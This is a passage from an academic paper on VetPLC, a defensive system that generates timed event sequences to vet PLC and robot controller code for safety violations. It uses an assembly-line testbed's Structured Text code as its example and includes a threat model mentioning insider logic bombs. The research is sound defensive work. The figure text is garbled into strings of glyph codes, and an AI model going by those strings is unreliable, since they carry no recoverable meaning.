Hence, PLC logic is not only triggered byinternal data inputs but also driven by external events dueto the coordination and communication among multiple units.Unfortunately, the aforementioned work focuses mainly on thetesting or resolution of input values and not on the complete event space of multiple collaborating components, and thus cannot automatically exercise real-life PLC programs. To address this problem, we propose V ETPLC, a temporal context-aware, program analysis-based system that automati- *&&&4ZNQPTJVNPO4FDVSJUZBOE1SJWBDZ  .V;IBOH6OEFSMJDFOTFUP*&&& %0*41 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. cally constructs timed event sequences . These sequences can then enable automated dynamic safety vetting of PLC code. Although they are still lacking in the PLC context, automated dynamic analysis and symbolic execution onevent-driven programs have been well-studied in the smart- phone [27], [46], [55], [67] and web [51], [66] domains. To model non-deterministic events, researchers have proposed to automatically generate event sequences of different orders, based upon program models [67] or testing [27], [46], [51],[55], [66] to drive program execution. Yet permutation ofevents is insuf cient to describe the conditions that lead tosafety violations in PLC code. The timings, at which events are delivered, matter. This is because PLC events have implicittemporal dependencies caused by both intrinsic durations andexternal physical constraints. Our key observation is that multiple event sequences of the same valid order may or may not lead to safety violations due to the different timings between events. Thus, generating timed event sequences is a requisite step to successfully reveal safety issues in PLC code. Thus, V ETPLC complements the prior research on dynamic analyses and symbolic execution that search merely the valuespace in PLC code. It further introduces novel techniques toexplore the timed event space so as to effectively exercise andexamine PLC programs. Speci cally, (a)to uncover the order of triggering events, we rst perform static program analyses on controller code (ofthe various interconnected units), including PLC and robot and generate timed event causality graphs to represent the temporal dependencies of cross-device events; (b)to quantitatively model the timing of events, we analyze the controller code to extract internal time limits, collect runtime data traces from physical ICS systems and then leverage data mining to recover temporal invariants; (c)combining this timing model with causality graphs, we then create timed event sequences that canserve as inputs for any dynamic PLC code analyses; to enableautomated safety vetting, we formally de ne and manuallycraft safety speci cations based upon expert knowledge andconduct runtime veri cation on PLC execution traces. It is worth noting that previous research has also sought to create timed event sequences for testing event-driven real-time programs. Event sequences have been produced fromeither manually crafted speci cations [48] or pro ling program execution time [52]. In contrast, we automatically extract event ordering and timing using program analyses and data mining, and further enable this technique in the new domain of PLCsand broadly in the context of ICS. To the best of our knowledge, we are the rst to enable timing-aware safety vetting on event-driven time-constrained PLC code for real-world ICS, in particular, via extracting eventtemporalities from program logic and physical environments. We have implemented V ETPLC in 15K lines of code 7K lines of C++ and 8K lines of Java. To demonstrate theef cacy of our approach, we apply it to 10 real-world scenarioson two ICS testbeds that are of completely different physicalcompositions: (i)the SMART [47] testbed is a scaled-down yet fully functional automotive production line and (ii)theFischertechnik testbed replicates a consecutive part processing facility controlled by multiple collaborative PLCs. Note thatthe PLC programs under examination remain intact, and wedid not introduce vulnerable code into them. Experimentalresults show that V ETPLC outperforms the state-of-the-art techniques and can effectively produce event sequences that lead to deep and authentic safety bugs, which are already hidden in real-world PLC code due to developers mistakes. In summary, this paper makes the following contributions: We explore physical ICS testbeds to gain an important insight: real-world controller code is event-driven and timing-sensitive. We are the rst to automate dynamic safety vetting of real-world PLC code via the creation of timed event sequences. We use custom static analyses, that address the speci c programming paradigms of PLCs, to extract causal rela-tionships among events. To the best of our knowledge, this is the rst work thatdistills temporal dependencies in physical ICS testbeds. We have demonstrated the effectiveness of V ETPLC on two different types of real-world ICS testbeds: V ETPLC has found organic vulnerabilities in real-world testbeds. II. B ACKGROUND Programmable Logic Controller. A programmable logic controller [18] is the core control unit of a large number of modern automation systems. It can be either used as a separated master controller or integrated as a slave controller to other machines such as CNCs. The basic functionality ofa PLC is to repeatedly generate control commands based oninput signals and internal control logic. On startup, a PLC is running in an in nite loop where each iteration, called a scan cycle , consists of three major phases. 1) Input: PLC reads inputs from external events (e.g., sensors) and buffers them in memory. 2) Computation: All variable values are xed. The PLC then invokes its logic program and calculates new variable states based on the buffered inputs and their current states. 3) Output: The PLC writes the computed new states into output memory in order to start the next cycle. PLC programming languages follow the international stan- dard IEC 61131-3 [10]. It de nes three graphical languages and two textual languages. All of the languages share IEC 61131-3 common elements and can be translated between each. In particular, the Structured Text (ST) is a high-leveltextual language that syntactically resembles Pascal (Figure 2)and thus is known for its understandability [20]. Notice,however, although an ST program resembles those written in other high-level languages, its data ow is very different dueto the existence of scan cycles . Since PLC variables are kept intact during the computation phase, value changes caused by logic code do not become effective until the next cycle. In effect, in any scan cycle, a PLC variable bears two versions :the current version from the last cycle is effective at thepresent time; the new version records all the changes in thecurrent round and eventually replaces the current one during  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. the output phase. As a result, 1) there exists no data ow within one scan cycle; 2) data ow happens between two neighboringcycles and the current value of a variable may be the result of any assignment instructions in the last cycle. Industrial Robot. An industrial robot is essential for per- forming various actuations, such as assembly, pick-and-place,packaging, etc. Robot programming languages of individualvendors are proprietary but in general fall into two cate-gories: high-level and low-level. High-level languages, such asKAREL for FANUC robots or RAPID for ABB, are in uenced by the Pascal syntax. Low-level code is assembly-like, and is developed through teach pendants which are handheld devices directly connected to robots. Aside from common program instructions (e.g., assignments, conditional or unconditional jumps and function calls), these programs all employ special motion instructions to guide physical movements and use wait instructions to enable delays and control timings. While Robot programs can be launched via a main function, in practice they are triggered dynamically by input events. The mapping between triggering signals and call targets is con gured using teach pendants. Without loss of generality, we hereafter ex- plain robot inner-workings based upon pick-and-place robots from FANUC that has the most industrial robots installedworldwide [56]. Speci cally, we focus on its teach pendant(TP) language, depicted in Figure 8, which is the de facto standard to program FANUC robots [1]. Cross-Device Communication. A PLC and a remote device communicate via signals using industrial network protocols, such as EtherNet/IP [8]. The remote device opens multiple pins for inputs and outputs. For example, a FANUC robot canenable 512 bits of digit inputs (DI) and 512 bits of digit outputs(DO). On the PLC side, each remote pin is mapped as a baseaddress (i.e., IP address) plus an offset. Thus, PLC code can control a remote device by directly accessing these mapped I/O bits. The I/O mappings are automatically con gured whena remote device is added to an ICS environment supervisedby a PLC. Once its IP address is determined, the underlying EtherNet/IP protocol takes the responsibility to recognize the I/Os on this device and bind them to PLC variables. III. P ROBLEM STATEMENT &A PPROACH OVERVIEW A. Motivating Example We motivate our problem using our SMART testbed [47], depicted in Figure 1. This testbed represents a fully functional assembly line that produces model cars. It consists of a gantry crane, a circular conveyor belt, 2 pick-and-place robots, 3 CNC (Computer Numerical Control) machines, and is controlled by a PLC. Particularly, it is equipped with Allen Bradley PLC from Rockwell Automation1and FANUC robots2. It is worth noting that the SMART testbed is a miniature of real-world automotive manufacturing sectors. It has been established and constantly upgraded for over 20 years, and has been used for numerous projects over the decades. This testbed 1Leading PLC supplier in North America w/ 60% of the market share [17] 2The most popular industrial robots worldwide [1] Fig. 1: SMART Testbed for Manufacturing Model Vehicles was developed by engineers from Rockwell Automation, fac- ulty and graduate students: the hardware components and theway they connect precisely resemble those on real-world fac- tory oors; a large body of controller code (e.g., robot motion, CNC operation, RFID I/O, etc.) was directly borrowed from industry practices [7]. The delity of this control system has been veri ed through consistent collaboration with Rockwell Automation. Physical Compositions. The gantry system serves as the entry and exit points of the testbed. It delivers empty palletsto CNC machine #1 to start the manufacturing processes and,eventually, it removes the produced parts from the conveyor. The circular conveyor belt is always on and keeps moving the pallets around the robots and CNCs. The robots and CNCmachines are organized into two cells to accomplish differenttasks (e.g., molding, ipping, etc.), where Cell 1 is comprisedof Robot #1 and CNC #1, and Cell 2 contains the rest. Immediately in front of each cell are RFID transceivers that can sense the presence of incoming pallets, empty or loaded, because RFID tags are attached to both pallets and parts. The RFID tag on a part maintains a numerical value indicating itsnext manufacturing process. A pallet stopper is also installed to every cell to block moving pallets. By default, the stopper is always enabled to block any arriving pallets unless a signalthat indicates otherwise is received. PLC and Robot Logics. Figure 2 and Figure 8 (in Ap- pendix A) show in part the control logic of the PLC and Robot #1 in Cell 1, respectively. The code snippets depicthow a processed part is passed from CNC to conveyor. Since a raw part has been delivered by the gantry to the CNC for processing, the PLC code (Figure 2) is now expecting to receive the processed part and deliver it to the next cellusing an empty pallet. The coordination between PLC androbot is realized through events. In order to receive and send these signals, 6 input variables (Ln.3-7,52), 2 output variables (Ln.8-9) and 4 internal variables (Ln.11-13,49) are declared.In each scan cycle, the PLC rst clears the output variablesduring initialization (Ln.16-19) and then checks all the inputvariables sequentially to update the outputs (Ln.21-44). More concretely, Ln.21-23 rst update the availability of an empty pallet at Cell 1 ( Pallet Arrival ) by checking the presence of a pallet ( Pallet Sensor ) and also the absence of a part ( NOT(Part Sensor) ). If, however, an incoming pallet is already loaded with a part (Ln.25-27), the PLC will send a signal via Retract Stopper to retract the stopper and let this pallet pass through. When an empty pallet has arrived at  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. 1PROGRAM CELL1 2 VAR 3 Pallet_Sensor AT %IX0.1 : BOOL; 4 Part_Sensor AT %IX0.2 : BOOL; 5 CNC_Part_Ready AT %IX0.3 : BOOL; 6 Robot_Ready AT %IX0.4 : BOOL; //DO[6] 7 Part_AtConveyor AT %IX0.5 : BOOL; //DO[2] 8 Retract_Stopper AT %QX0.1: BOOL; 9 Deliver_Part AT %QX0.2 : BOOL; //DI[0] 10 11 Pallet_Arrival AT %MX0.1 : BOOL; 12 Update_Part_Process AT %MX0.2 : BOOL; 13 Update_Complete AT %MX0.3 : BOOL; 14 END_VAR 15 16 Pallet_Arrival := false ; 17 Retract_Stopper := false ; 18 Deliver_Part := false ; 19 Update_Part_Process := false ; 20 21 IF Pallet_Sensor AND NOT(Part_Sensor) THEN 22 Pallet_Arrival := true ; 23 END_IF; 24 25 IF Part_Sensor THEN 26 Retract_Stopper := true ; 27 END_IF; 28 29 IF Pallet_Arrival AND CNC_Part_Ready AND Robot_Ready AND NOT(Part_AtConveyor) THEN 30 Deliver_Part := true ; 31 Update_Part_Process := true ; 32 CNC_Part_Ready := false ; 33 Robot_Ready := false ; 34 END_IF; 35 36 IF Update_Part_Process THEN 37 //Call subroutine to update process No. 38 UPDATE_PART(2); 39 END_IF; 40 41 IF Update_Complete AND Part_AtConveyor THEN 42 Retract_Stopper := true ; 43 Update_Complete := false ; 44 END_IF; 45END_PROGRAM 46 47PROGRAM UPDATE_PART 48 VAR_INPUT 49 Part_Process AT %MD50 : DWORD; 50 END_VAR 51 VAR 52 RFID_IO_Complete AT %IX0.6 : BOOL; 53 Update_Complete AT %MX0.3 : BOOL; 54 END_VAR 55 //Perform 15-step I/O operations on RFID 56 ... 57 IF RFID_IO_Complete THEN 58 Update_Complete := true ; 59 END_IF 60END_PROGRAM Fig. 2: PLC ST Code for Picking Up Processed Parts Cell 1, the PLC code (Ln.29-34) will further check the Boolean inputs, CNC Part Ready ,Robot Ready andNOT(Part - AtConveyor) , to con rm the existence of a processed part, availability of robot and clearance of parts on the conveyor,respectively. If all the conditions are satis ed, the PLC will then perform two actions: 1) requesting the robot to pass the processed part to pallet and 2) updating the manufacturing process number on the part. Two signals Deliver Part and Update Part Process are thus enabled. 1)Deliver Part . Based upon con guration, the variable Deliver Part is mapped to a digital input ( DI[0] )o nt h e robot side. Being true, this signal triggers the robot program in Figure 8 to execute. The robot code then operates therobot arm, via a series of motion instructions such as linear movement L or joint movement J , in order to pick up a part from the CNC machine (Figure 8 Ln.6-12) and passit to the conveyor (Figure 8 Ln.18-20). When the part has beendelivered to the conveyor, the robot turns on its output signal DO[2] for 0.5 seconds to indicate the completion (Figure 8 Ln.22-24). This output is then mapped to Part AtConveyor on the PLC. In the end, the robot returns to a safe zone. 2)Update Part Process . When this variable is true, a subroutine UPDATE PART(int) is called to conduct a 15- step I/O operation on the RFID attached to the part (Ln.36- 39). When this is done, the subroutine (Ln.47-60) will receive aRFID IOComplete signal and then notify its caller by setting the Boolean variable Update Complete . To check whether the two actions are completed, PLC constantly reads two response signals Part AtConveyor and Update Complete . When both signals are true, PLC will retract the stopper to transfer this loaded pallet (Ln.41-44). Safety Violation and Root Cause. This code, in fact, can lead to item over ow [9], which is a typical type ofsafety issues on the factory oor. Fundamentally, it is causedby mismatched expectations between the sender (robot) and receiver (PLC) of event Part AtConveyor s duration. The signal Part AtConveyor has dual purposes. When it is true, it indicates the robot has delivered a part to the pallet, which can now leave the cell. When it is off, that means the conveyor has been cleared to accept a new part, and the robot can then move away from conveyor for anotherdelivery. However, in practice, the robot does not need to stop at conveyor waiting for the pallet to leave. Although the robot cannot pass the second part to the conveyor prior to thedeparture of rst one, the robot can, in fact, move towards theCNC in advance to save time for the next delivery. For the sake of saving time, the developers implemented a timeout in the robot code and only allowed the event Part AtConveyor (DO[2] ) to last for 0.5 seconds (Figure 8 Ln.23-24), no matter if the conveyor is cleared by then. As a result, the robot is guaranteed to start handling another delivery 0.5 seconds after the previous one. Unfortunately, if the robot turns off Part AtConveyor prematurely, the PLC may never see both Part AtConveyor andUpdate Complete being set to true at the same time, either due to an unexpectedly fast part delivery or slow RFIDupdate. This is also because PLC developers typically do notbuffer old signal values (in this case, Part AtConveyor being TRUE ) but rather always read data directly from theirorigins, in order to avoid synchronization problem. In fact, a real-world error has been reported from the SMART testbed when the speed of robot is increased to a certain extent, and thus Part AtConveyor ends even before the update of process number is complete. Then,there exists no window when both Update Complete and Part AtConveyor are true (Figure 3b). In that case, even if the pallet has already been loaded, it can never leave the cell. This error can cause a serious safety issue since the con- veyor will over ow due to the constantly arriving pallets.  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. /g25/g20/g5/g14/g9/g14/g17/g21/g5/g11/g8/g10/g19 /g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g7/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g24/g20/g2/g3/g2/g21/g4/g8/g15/g17/g21/g5/g11/g8/g10/g19 /g22/g20/g4/g8/g12/g12/g11/g17/g21/g6/g11/g13/g16/g14/g15 /g2/barb2right/g3/barb2right/g4/barb2right/g5/barb2right/g6/barb2right/g7/barb2right/g8/g1 /g9/g12/g13/g13/g11/g10/g14/g23/g20/g1/g4/g8/g15/g17/g21/g6/g11/g13/g16/g14/g15 /g26/g20/g1/g4/g8/g15/g17/g21/g1/g17/g2/g14/g13/g18/g11/g19/g14/g15/g2/g1/g3/g4 (a) Sequence 1/g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16 /g1/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g2/g4/g3/barb2right/g6/barb2right/barb2right/g5/g1/g7/g9/g9/g8/g9 /g1/g3/g2/g4/g10 (b) Sequence 2/g24/g20/g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16 /g1 /g6/g8/g16/g17/g21/g1/g17/g2/g14/g13/g18/g10/g19/g14/g16/g4/g5/g3 /g23/g20/g7/g15/g9/g8/g17/g10/g21/g2/g14/g12/g15/g11/g10/g17/g10 /g2/g4/g3/barb2right/g6/barb2right/barb2right/g5/g1/g7/g10/g11/g11/g9/g8/g13/g1/g3/g2/g4/g12 (c) Sequence 3 Fig. 3: Event Sequences with Different Orders and Timings Eventually, it will cause pallets to collide and fall, or even cause the overloaded conveyor to break. Though seemingly straightforward, this is in fact a typical safety violation that can cause severe injuries on the factory oor and thus has attracted attention in both industrial practices [5], [6], [9] and academic research [37]. It is worth noting that although we highlight this issue using collaborative PLC and a robot, it is actually a common problem that can be caused by coordination of any types of controllers, such as multiple PLCs, PLCs and CNCs (con- trolled by an integrated slave PLC) or CNCs and robots. Both our experience and domain knowledge from eld engineers (from Rockwell) show that a large portion of PLC safetyproblems originated from the coordination required betweenmultiple units because they are manufactured by differentvendors and programmed individually without considering different contexts (e.g., timing). Nevertheless, we believe the problem involving PLCs and robots is the most challenging one to address because it requires the understanding of multi- ple programming languages and their interactions. Hence, we focus on such a case to explain our approach. However, aswe show in the evaluation, our system can be applied to otherclasses of coordinating systems as well. Challenge for Detecting the Problem. Static analyses may cause signi cant false positives due to the lack of runtime constraints and thus cannot easily address this problem. For instance, a potential error state detected by static analysis may only be triggered when the speed of robot is greater than 10m/sec, which however can never be reached in practice. In contrast, dynamic analysis and symbolic execution do not cause false positives. To use them on event-driven pro-grams, prior work [27], [46], [51], [55], [66], [67] gener-ated event sequences of different orders to exercise codeand explore paths. In our case, one can create an eventsequence following the order of 1:Pallet Sensor /squiggleright2: Part Sensor /squiggleright3:CNC Part Ready/squiggleright4:Robot Ready /squiggleright5: Part AtConveyor /squiggleright6:Update Complete /squiggleright 7:Part AtConveyor , as illustrated in Figure 3a. Note that eventually Part AtConveyor terminates due to the robot logic. Exercising PLC code using such this sequence doesnot lead to any error. One can then permute the events by switching 6:Update Complete and7:Part AtConveyor (Figure 3b). Then, the safety problem will occur at runtime. However, just rearranging the event order may not solve the path discovery problem in time-constrained controller programs. For instance, the event sequence in Figure 3c sharesthe same ordering as the one in Figure 3b, yet it cannot cause /g5/g14/g21/g14/g25/g11/g27/g18/g21/g16/g1/g4/g29/g14/g21/g27/g1/g3/g11/g28/g26/g11/g19/g18/g27/g31/g1/g5/g25/g11/g23/g17 /g35/g26/g33/g20/g33/g26/g34/g26 /g2/g28/g27/g22/g20/g11/g27/g14/g13/g1/g8/g11/g15/g14/g27/g31/g1/g10/g14/g27/g27/g18/g21/g16 /g30/g32/g1/g9/g18/g20/g14/g13/g1/g4/g29/g14/g21/g27/g1/g8/g14/g24/g28/g14/g21/g12/g14/g26 /g14 /g27 /g27 /g18 /g21 /g16 /g7/g18/g21/g18/g21/g16/g1/g9/g14/g20/g23/g22/g25/g11/g19/g1/g6/g21/g29/g11/g25/g18/g11/g21/g27/g26 Fig. 4: Overview of V ETPLC System the error. When the time difference between events 7and6 changes, the consequence may also vary. To address this problem, we expect to automatically produce effective, error-triggering event sequences (such as Figure 3b) by considering both ordering and timing of events. Noticethat an alternative approach is to model internal timeouts as external events and then perform event permutation withoutconsidering timing. For example, the termination of event Part AtConveyor can then become another independent event, and the permutation thus is conducted over 8 events.However, we would argue that this solution has two majorshortcomings: 1) it may drastically increase the event space; and 2) the generated sequences can cause false alarms because they may still violate critical time and physical constraints andthus are actually invalid. Its fundamental limitation lies in thefact it assumes the complete independence of individual eventsand does not quantitatively consider their temporal contexts. B. Threat Model We consider that adversaries can trigger vulnerabilities in benign (but faulty) PLC code via manipulation of con gurationoptions that impact important physical properties such as machine speeds. In addition, we also consider that insiders can compromise PLC source code to intentionally inject (stealthy) safety violations (e.g., PLC logic bombs [41]). Note that insider attacks are top security challenges [40], [64] for air- gapped ICS and have been identi ed in major ICS incidents in- cluding Stuxnet and the Maroochy Water Services Attack [23].As a result, PLC source code and con gurations may not betrustworthy. Note though, we assume that the rest of the ICSenvironment, including hardware and operating systems, aswell as our data collection mechanisms are trusted. It is worth mentioning that, at this point, our work is mainly focusing on the detection of safety violations. However, some of the techniques we developed can also be useful to addresssecurity challenges in the ICS context. C. System Overview To achieve our goal, we have developed V ETPLC, that consists of 3 major steps. Figure 4 illustrates its architecture.We hope to deploy V ETPLC as a vetting tool to examine any PLC code before it is released for a production system. (1)Generating Event Causality Graph. Given the PLC and robot code, we rst perform static program analysesto extract the event causality graphs for interconnected devices. We further leverage speci ed I/O mapping to handle cross-device communication. (2)Mining Temporal Invariants. Next, to understand those quantitative temporal relations that cannot be revealed by  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. program code, we collect runtime data traces of PLC variables from physical ICS testbeds. We then examinethe traces to infer the occurrences of particular events and conduct data mining to discover temporal event invariants. (3)Automated Safety Vetting with Timed Event Se- quences. Constrained by the generated timed event causal- ity graphs, we perform event permutations to automati-cally create timed event sequences. Then, we apply thegenerated sequences to exercise PLC code for dynamicanalysis. To automatically identify safety problems, weformalize and craft safety speci cations according to ex-pert knowledge so as to perform runtime veri cation. IV . T IMED EVENT CAUSALITY GRAPH A. Key Factors An a ve approach to deriving event sequences is to consider every combination of events. For instance, prior work has presented a baseline approach, A LLSEQS [27], that exhaus- tively permutes all UI events to create triggering sequences for testing Android apps. However, due to the massive pos- sible permutations, such a solution can be prohibitively timeconsuming. In fact, not all permutations are valid sequencesbecause the causal dependencies of PLC events are inherentlyconstrained by controller code. To reduce the search space, we can extract such dependencies from program logics in the rst place. Particularly, we are interested in three causal factors. Control-Flow. We take into account intra-procedural, inter-procedural and cross-device control ow dependen-cies: 1) within a function, event variables evaluated in anIF-Condition have direct causal impact on those de ned in its IF-Clause; 2) for function calls, we consider that the callsite in the caller causes all the logic in the callee; 3) cross-device event exchanges via mapped I/O indicate the causal relations between code on multiple controllers. Constants. The constant value of an event-related vari- able in an IF-Condition can partially determine if the IF-Clause becomes effective. Thus, the data ow from the constant assignment to the condition check of this variable indicates that the former causes the latter. Event Duration. The causal effect of events may last for a certain amount of time when subsequent states aremaintained. Machines with local memory can produceevents with permanent states. The PLC can also help pre-serve the states of transient signals (i.e., sensor readings)or its internal events. In the meantime, event senders canalso proactively terminate signals based upon timing. In addition to these internal factors, the occurrences of events are also affected by external timing constraints caused by physical actions, such as robot motion and external I/O operations. We will discuss this in Section V . B. F ormal De nition To interpret the internal constraints on event ordering, we extract the causal and temporal relations among events from PLC and robot code to generate dependency graphs. In particular, we describe the cross-device event dependencies/g4/g17/g19/g18/g27/g17/g24/g31/g9/g13/g24/g26 /g6/g17/g5/g9/g8/g15 /g1/g18/g6/g19/g1/g5/g11/g7/g11/g12/g1/g6/g10/g8/g9/g4/g3/g2/g1/g6/g10/g8/g9 /g9/g13/g19/g19/g17/g26/g31/g11/g17/g21/g25/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g1/g9/g13/g24/g26/g31/g11/g17/g21/g25/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g3/g7/g3/g31/g9/g13/g24/g26/g31/g10/g17/g13/g16/g28 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g10/g22/g14/g22/g26/g31/g10/g17/g13/g16/g28 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g1/g9/g13/g24/g26/g31/g2/g26/g3/g22/g21/g27/g17/g28/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g6/g19/g9/g13/g19/g19/g17/g26/g31/g2/g24/g24/g18/g27/g13/g19 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19 /g12/g23/g16/g13/g26/g17/g31/g9/g13/g24/g26/g31/g9/g24/g22/g15/g17/g25/g25 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19 /g9/g13/g24/g26/g31/g2/g26/g3/g22/g21/g27/g17/g28/g22/g24 /g6/g17/g2/g4/g15/g1/g18/g20/g16/g21/g14/g19/g4/g6/g32/g34/g33 /g7/g17/g2/g4/g15/g1/g18/g6/g19 /g4/g8/g32/g36/g33 /g7/g17/g5/g9/g8/g15/g1/g18/g20/g16/g21/g14/g19/g10/g5/g6/g4/g31/g6/g8/g31/g3/g22/g20/g23/g19/g17/g26/g17 /g6/g17/g2/g4/g15/g1/g18/g6/g19 /g12/g23/g16/g13/g26/g17/g31/g3/g22/g20/g23/g19/g17/g26/g17 /g6/g17/g3/g13/g11/g10 /g12/g15/g1/g18/g6/g19/g32/g35/g39/g25/g29 /g1/g36/g34/g25/g33/g32/g37/g25/g29/g1/g37/g40/g30/g38/g25/g33 Fig. 5: The TECG of the Motivating Example using Timed Event Causality Graphs (TECG s). At a high level, a TECG is based upon the And-Or Graph [53] that can illustrate the causalities among events and express their and/orrelationships. A formal de nition is presented as follows. De nition 1. ATimed Event Causality Graph is a directed graph G=(V,E, , ) over a set of events and a set of time durations T, where: The set of vertices Vcorresponds to the events in ; The set of edges E V Vcorresponds to the causal dependencies between events, where the combination of all immediate predecessors of a vertex can always cause thissuccessor event to happen. Speci cally, if some of thesepredecessor vertices form a conjunction, their outgoing edges become compounded using an arch ; if they form a disjunc- tion, the corresponding edges are separated. The labeling function :V associates nodes with the labels of corresponding events, where each label is comprised of 3 elements: event name, class and duration. An event is named after the atomic proposition it affects. For instance, if an event causes a==15 to be true, we name it as a==15 ; if it causes Boolean cto be false, we refer to it as c . We consider 6 classes of events, including input (P IN), output (P OUT), local (P Local) events of PLC and those of a remote device (R IN, R OUT, R Local). The event duration is either Permanent (P), meaning it is always enabled until turned off by PLC logic, or a nite amount of time. The labeling function :E Tassociates edges with the labels of time intervals. These labels are concrete numbers if we can retrieve the corresponding time intervals from ICStestbeds; otherwise, they are Indeterminate . C.TECG of Motivating Example Figure 5 depicts the TECG of the motivating example. At rst, this automation system expects to receive events from two sensors. The conjunction of a positive event, Pallet - Sensor , and a negative one, Part Sensor , triggers the PLC local event Pallet Arrival . Then, if all of the 4 events, Pallet Arrival ,CNC Part Ready ,Robot - Ready and Part AtConveyor are received, the PLC will signal the robot via an output event Deliver Part . Hence, the conjunction of these four events leads to the generation of Deliver Part , and such a causal dependency is represented by the compounded edges from the former to the latter. Further, Deliver Part is mapped to the robot event  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply. DI[0] , which causes the robot arm to function. Once its oper- ation is completed, the robot turns on the output DO[2] and in effect sends the event Part AtConveyor back to the PLC. Thus, these events are connected due to cross-device controldependencies. Since DO[2] (Part AtConveyor ) terminates in 0.5 seconds according to the robot code, its duration is 0.5s instead of Permanent . In the meantime, when the conjunction of aforementioned 4 events is satis ed, another PLC local event Update Part - Process will occur. This event causes a subroutine call, in which PLC starts to update the process number encoded in theRFID on the part. Once the update is done, the RFID replies to the PLC with RFID IOComplete , which in turn triggers Update Complete that the main routine expects. By default, the time intervals of all edges are Indeter- minate , and thus are not shown on this graph. We laterperform data mining on traces collected from ICS testbeds to extract temporal invariants associated with certain edges, such as Update Part Process[3s,39.4s] RFID IOComplete . D. Graph Construction To generate TECG s, we perform static analyses that are tailored for the unique programming paradigms of PLC code. a) Special Consideration for PLC Scan Cycles: Prior work has paid special attentions to PLC s dedicated data types,such as Timers and Counters [54], and its preemptive thread scheduling model [43]. In addition, we believe that it is also crucial to take into account PLC s scan cycles that cause implicit, yet signi cant impact, to entry points and data owof PLC code. Nevertheless, to the best of our knowledge, this has never been seriously explored in prior work. Entry Point Discovery. PLC code is event-driven and thus all its event handlers are program entry points. In contrast totypical event-driven programs that use dedicated constructs toexplicitly implement event handling mechanisms, event han-dlers in PLC code are implicitly de ned using IF-Conditions.Because internal value changes in one scan cycle do notbecome effective until the next one begins, the IF-Conditions in PLC code can only be affected by external inputs received at the beginning of a cycle. Therefore, in effect, they act as eventhandlers to capture either new sensor readings or updates fromlast cycle. Hence, an IF-Condition becomes the entry point ofits IF-Clause code as well as the subroutines called by the IF- Clause. For IF-Clause code wrapped by nested IF-Conditions, we consider the inner-most one to be its entry point. Data ow Analysis. The fact that variables are of xed value in every cycle also causes the data ow to change. As explained in Section II, the process of data ow analysis for PLC code is mainly to track data dependencies between scancycles. Further, due to the existence of asynchronous eventhandlers, the analysis should compute data reachability fromany de ne in one cycle to any use in the next. b) Graph Construction Algorithm: Our algorithm for generating timed event causality graphs is illustrated in Algo-rithm 1. This algorithm expects to receive three inputs, PLC, REMOTE andIOMapping . They represent PLC code, a set ofremote controller code (e.g., robot code) and the I/O mappings between PLC and remote devices, respectively. Its output isa timed event causality graph, TECG , which is comprised of a set of edges. The I/O mappings are automatically establishedwhen remote devices are added to the PLC and thus can beretrieved from PLC con gurations. During initialization, we set TECG to be an empty set. Next, we transform all predicates in the IF-Conditions ofPLC code into disjunctive normal form (DNF) in order to illustrate them using an And-Or graph. Thus, an original predicate becomes a set of sub-predicates connected via OR logic, while each sub-predicate is a conjunction of events depicted as compounded edges. Further, we retrieve all the entry points (i.e., IF-Conditions) EPof PLC code. Meanwhile, we also link neighbors of nested IF-Conditions to show their control relations. Then, we iterate over every event (i.e., atomic proposition) pin inEPand seek its root causes, which are events or event combinations that can always lead to pin. We rst aim to discover the root causes for pinwithin the PLC code. To this end, we perform use-def chain analysisto obtain the de nition set DEF ofpin and then look for the entry point EP (again, IF-Conditions) of each de nition def inDEF . The events in EP thus have causal impact on def and onpin. To ensure the positive causal dependency betweenEP andpin, we also conduct constant analysis for def.I fdef is a constant and its value can satisfy pin,w e can then determine that EP can cause pinto happen. Hence, we call TECG .ADDCOMPOUND EDGES () to link EP withpin and handle the construction of compounded edges. It is worth noting that since IF-Conditions in one scan cycle can be affected by any code in the previous one (data ow- wise), our use-def chain and constant analyses will look for de nitions from everywhere in PLC code. Ideally, we can con- sider an in nite chain of scan cycles and compute backwarddata ow exhaustively in an iterative fashion. However, suchcomputation is excessively expensive. Besides, the generateddependencies can be extremely complex (e.g., conditionaldependencies) and therefore may not be easily applied to eventsequence generation. Thus, in practice, we take a conservative approach and only look back for one previous cycle. As a result, our analysis may miss some dependencies in speci c conditions. Nevertheless, while missing a dependency maylead to invalid permutations of events, it does not result in theexclusion of valid event sequences. Moreover, our evaluation shows that, although conservative, our analysis can already help remove a large number of invalid sequences. Besides searching for intra-PLC causalities, we also seek possible root causes of pinacross devices. Our cross-device analysis starts from Ln.13. It is performed on an on-demand basis and only begins when pin is mapped to an output of a remote device. If pin indeed exists in the IOMapping , we retrieve its mapped counterpart rout and add an edge (rout,pin )into TECG . Then, we search for the entry point REP forrout in the code of remote controller (e.g., robot, CNC, PLC). The entry point 